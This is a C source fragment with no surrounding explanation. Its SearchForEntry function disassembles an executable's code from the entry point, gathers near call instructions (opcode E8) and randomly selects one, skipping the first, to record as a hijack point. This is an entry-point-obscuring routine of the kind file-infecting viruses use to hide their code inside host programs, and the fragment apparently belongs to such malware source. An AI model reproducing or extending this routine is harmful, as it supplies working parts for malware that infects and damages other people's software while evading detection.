typedef struct EPO_Info
{
U32 raw_;
U32 from;
U32 to;
} EPO_Info;
U32 SearchForEntry(U8* file_buf, U32 image_base, U32 raw_entry, U32 entry, int code_size, EPO_Info* epo_info)
{
EPO_Info valid_call[MAX_EPO_CALL] = { { 0 } };
U32 _eip = entry + image_base;
int total_instr_len = 0, cur_instr_len, i = 0;
char code_text[1000] = { 0 };
__try {
file_buf += raw_entry;
while (total_instr_len < code_size) {
cur_instr_len = Disasm(file_buf, code_text);
if (cur_instr_len <= 0) {
break;
}
if (file_buf[0] == 0xE8 && cur_instr_len == 5) {
valid_call[i].raw_ = (U32)file_buf;
valid_call[i].from = _eip;
valid_call[i].to = (_eip + *(U32*)(file_buf + 1) + 5);
// We have find enough valid call
if (++i >= MAX_EPO_CALL) {
break;
}
}
file_buf += cur_instr_len, total_instr_len += cur_instr_len, _eip += (U32)cur_instr_len;
}
} __except (1) {
return 0;
}
if (i == 0) {
return 0;
}
srand(GetTickCount());
// Do not modify the first call if possible
i = (i == 1) ? 0 : (1 + rand() % (i - 1));
*epo_info = valid_call[i];
return 1;
}
